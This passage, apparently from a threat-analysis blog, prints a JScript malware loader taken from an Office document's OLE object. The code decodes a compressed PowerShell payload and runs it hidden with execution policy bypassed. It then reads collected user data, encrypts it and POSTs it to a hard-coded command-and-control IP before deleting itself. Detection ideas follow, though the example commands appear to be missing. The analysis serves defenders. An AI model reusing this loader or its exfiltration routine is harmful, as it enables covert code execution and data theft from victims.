HBWU2lCMnoyQ1pNcldRY3IwV2YzbVY0Mi9Cb1l4S0NsempQMW1IVjVOSDhqc0dKWGJoSWpha0Q2L25PUDV2dTVBWGxjaEZUMHlrYVIrZHdJaVBmM25UUE5pd0x2VWZ0Mk5IeW9BSnlDdEhIMWVzZEM5dlpHSnZYUUkwQ1AyZlQxcVhkanRRVUExT1JGaGp2SU5tUXpjbnV2M1ZrZ2syMHlLejJBVk03NkxmN0I4QVh6RXdiaGdSTXRJMU5iTDg3Y3FYbVF0YVBrNVhIZ2Vhd01YcDdxc3pyNmd0RmpSM0UwRHpLcXQ1bnliSVFyNDFUeVR0bitacSs4dHBXQlhZL2ZUQTlrVVdNb0JnalZ1WW1laUNYZHhOcGtMZjNWSHpPRWdqZGNpY3B2eDNXT3VmRUs1c3NYRDcyYWR3UUdMZVBrcjJ0aWdzdmRtRnZrN1BhTktFZHViZkxrb2ZCV2RnSHNuNXZiZDdzWmxxYVhBYU9NNzdNeFRxS0ljUytXTXBnMTMyWlJEU1hkWmtIZW9xUWl3ZlBaelovYUtnUjZIL2tiUlBuMlg3clh4ZUJPazJHbHc4azFndDA2NWoxQ3BFeEo4dmhWWkNwTXR6WWZjYjhPMi9yVTltdTE2eFZpK0x1R0tzYU5SMGViUTdxUHNuV3FLaXR4UVl0Sk1yc0JRdHJOVnRmVnp0N0FjKzk4MW9sTENqWlFqcUhFa0hZM013bnorVHo0VzNpdDhVaHZ1eWpHbjMxdlFqaU5iQitUSVRaUEV0bXVvMjNhVDVXNjNiMXFFMWVNdmxteXRoMm5kRU1qQVpkZVhxTHM3aGNScm0rUnFOazdweGZsV08wbG5OL3dnM054MThTTXRpMHAzTHo2a2J0bUt5OFNaMDQrN3E5M3llNVUzd29lNytpci9KNG5LSGVXcU5tVGxTeDQ5Qi9uRWsxNmpwME5GTlFyRURoai80VzFXaGdTaHR0MVRYUE5CeGIrU1d1VU93ZzdPeHYrNkYyRU5XYUJQZjZOSkxhcWpmeFBQMjYxUjNHL0huaDVGZDRTWkY5RXNvcURNMGo1ZTFycmIyd2ZjKzJONnBQSGh6OWROYU43cDZkOURMR3VPUmg3aXpIYlYvWEkxQzBaNnN2WE1XdEZtMHgyZFhNWjNzVTJhOFdRRCtYT1lDMVJTNEZhNFBoSU0zQVhJQlQ2a0pRNzZMZ1MzcXJHRmFLWXRETGVaOEI0R1ZMMExrT0YxOTRSdjFkTHFhYjhZc1Vtenk1TGtmTVJydExVejNQUnNkVUZiNm5TVlJ3MUFjd3p4UVZpS1dLNytha3kzWDFBQkY1d2lvSWtSUUsxTEh2TTlHMStlY0RCM2NyMkpQU3p0NTM1dFNubEJrN2JwRlJtc0xGOGhGYmpzZ0hObERFa3Z3dHlmd3AwSytoZFpHTUVyRmo0STl3b1hCRUFtdDU3eEJPNUlFa0orMXYvZFk1enltc3VndGFrd2N0Zkhpc294bWNxZkk1ZFo3TUpWcEU1QzN2SUlFTWV4d2phNlVnWUc4cHhiV1M2a3FsdkF1cGJrcUtXeTNVY1RCUTdIakE0R2FISHVxVEN2Vi8zaDJSQmZjaXV1NWVqSGRiSUVZYVl2Z2RTQ0hlQ2lOeS9EUTVKMlAwSUtVaEJWWGVydXNJd2dQdzdLSnlXRWdmU1ZsNW1TeUVZOTBDa0htZVkvZGRxcXhpSWMyNExrSk5ZVVZwMWVyY2ZSVVJvaGh5T3Bja0loM3QzQjRGZDBlWkcxSGJ6V1hmRnlZeTBjZlpseVR1Q1NQaU1FQ1JneUtHVW1vWU5pZDFLcVNyUG1ML2FLY1M2WVBtUTVuTEUvV2x3N0FiUzR4WGhyZkdFQm5pa2VlNmpEa2p2T1dFMTV6ejIwUFNxSEx0OXVBdjhGSWFHVEpBNVFqakluSFhNaU9idXFwNTRleEZIdEE0UnluYnRkaGFKbENXajZzV1hoblRtV28zV2tWcTMzSmx3U1BtaWxHVmpUa3lUKzdUV3VFNG9SaHRXU0ozaU1FVzZOeHhobGpQQ2FCQVZXaEFkMFRMdllUV2xVSVZCZ3VGd3V2a0QxR002V0pxMHdEOC9GZ2hjcklCZGFQRDI1dWZyM21Od0pBalRobkdoci9MSG12OXlPWXdxd2FDUkJpK21IZmNBbHdlR1RKMk8rbTRRL2d4OC9pZGs3QlFibzc5eG9TMFI2cC9mQ1BMdWJOY3RUSzBIQk5Tc21wd1JLZ3NacFNOOGJJR2VLSHlkOGJvRzNWWEdmVWRrYnRyenBoTnRDUkJ3bGVPem1pcytTVWJYblNhS1BhckpDb1NKRUd4UG9qWVY2cjg3Z3YxK3FjUDNoU0hFT3RGTHc4UkE5djc4QXRGa2hmcVJSdjd5b3R3TERrdmhsRUtNVHhGdFlkS2pZa1JJc3NSY3ZVR29XendGZDhqdW81eEtSR29OdmgzWHJrYkNXa2dGamVNVkhIeXRMSlJGWFhBdWpKVkF0U2tvMHgyNzczc0lwN0laa2Y0RlJINlBoQndMYkJkdU53aUFhZXV6OS9BMkJRY05nWjliOExHaGJFZXJrOXdmWVRySTF3UGNSMVZOTk5waVFHd2VqWVBCTDBSL2JqcjQvbVBmL3p5bi8venkxOEh1YnpvNmZDV1RaMS9UMW43eDFlcHp2Lyt6L25ZVHRmcTd6Ky8rdU9iZi9zZHQvNllIL25IQi8vNys4L1pPUFVVOVBXMTFEUHJ1dmJQTjI3OStmUnV2LzNYNy85MmlELzhQOFB2NDY0R2VmcnpzOTkrK2V1cVN2L2ZEcjRuL1B6VGQxTlp0c1BjMy83OTlMNm50L3ZibisvbWUwN01Iei83NDh4Ly8vR1hIN09SNnhmcUhpN1haSC81aTlyWCtuVXMzN01mUi9WN2VNblY1Mkx3K2E5M0ovenljd0x6NzltTC8reFF2L3p4VjcvKzk2OC9GdjNKejhrWGYvMWpDLzRQCidACiREZWZsYXRlZFN0cmVhbSA9IE5ldy1PYmplY3QgSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbShbSU8uTWVtb3J5U3RyZWFtXVtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkRW5jb2RlZENvbXByZXNzZWRGaWxlKSxbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcyk7CiRVbmNvbXByZXNzZWRGaWxlQnl0ZXMgPSBOZXctT2JqZWN0IEJ5dGVbXSg2MzE0OSkKJERlZmxhdGVkU3RyZWFtLlJlYWQoJFVuY29tcHJlc3NlZEZpbGVCeXRlcywgMCwgNjMxNDkpIHwgT3V0LU51bGwKKFtUZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRVbmNvbXByZXNzZWRGaWxlQnl0ZXMpKSB8IElFWAo=";
 var jsLoaderPS1 = "59d76612d0bf51.62744684.ps1"; 
 var jsLoaderRunDir = "{453359DE-4049-82E2-E58D-F96EEF430F04}";
 
 var fldr = sh.ExpandEnvironmentStrings("%HOMEPATH%") + "\\" + jsLoaderDir + "\\" + jsLoaderRunDir;
 
 if (fso.FolderExists( sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64" ))
       var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; 
    else 
        var powershell_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";

 var p = fldr + "\\" + jsLoaderPS1; 
 
 var vers = "3";
 var uuid = "1";
 var com_pref = "oc06";
 var botSufx = "_oOG4DHP3g";
 var kkid = "203";
 var alfIn  = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
 var alfOut = "Dt4bzk9T0fOQVvo2Mw1JgnZR5PhFaBG3cYWiUAjHNIdXCql8rspSLEuy7x6mKe";
 var sepr = "%SEPR%";
 var botId = cuid() + botSufx;
 botId = vers + "-" + uuid + "-" + com_pref + "-" + botId;
 var urlArr = [];
 urlArr[0] = "http://31.148.220.215:80/cd";
urlArr[1] = "http://31.148.220.215:443/cd";
urlArr[2] = "http://31.148.220.215:8080/cd";
urlArr[3] = "http://31.148.220.215:53/cd";
urlArr[4] = "google.com";

 
 pausecomp( 2 * 60 * 1000 );
 
 var f = fso.OpenTextFile(p,2,1);
 f.Write( b64dec(PS1Body) );
 f.Close(); 

 cmd = powershell_pthpath + ' -version 2.0 -NoP -NonI -ExecutionPolicy Bypass -WindowStyle Hidden -File "' + p + '"';
 sh.Run(cmd, 0, false);
 
 pausecomp( 5 * 60 * 1000 );
 try{ fso.DeleteFile(p, true); }catch(e){}
 
 var usrName = sh.ExpandEnvironmentStrings("%USERNAME%");
 p = sh.ExpandEnvironmentStrings("%APPDATA%") + "\\" + usrName + ".ini"; 
 var outData = readFile(p); 

 try{ fso.DeleteFile(p, true); }catch(e){} 
 var contentsHtml = "";

 outData = b64enc(outData);
 outData = "stels" + sepr + outData;
 var entry = randomParamName();
 var v = encodeURI(SimpleEncrypt(outData))
 contentsHtml = downLoadUrl("POST", urlArr, randomUrl(botId), entry + "=" + v);
 
 fso.DeleteFile(WScript.ScriptFullName, true); 
}catch(e){}
*/}).toString().slice(16,-4);

try {
 lalala();
} catch(e) {
 eval(evalString); 
}

The payload is dropped from the IP  31.148.220.215/cd as can be seen in the script above.

To detect this threat, as it has a very unique Schedule Task, can be detected checking all the schedule tasks with the string "user\", where the maliciuos script is allocated. For example, the following PowerShell command could be executed with a script across different system




What other useful Use Cases can be used to detect this threat?

Any JS script executed using a TXT file is an anormal behaviour, for example:





Any Wscript command spawing PowerShell



Any created schedule tasks which uses a file from a user directory





The technique of embedding malicious code in office document via OLE objects is not new at all. Monitoring the processes created by office applications or WScript commands executed is a good source of spotting malicious activity. The schedule tasks in user space is also a good source of potential maliciuos activity.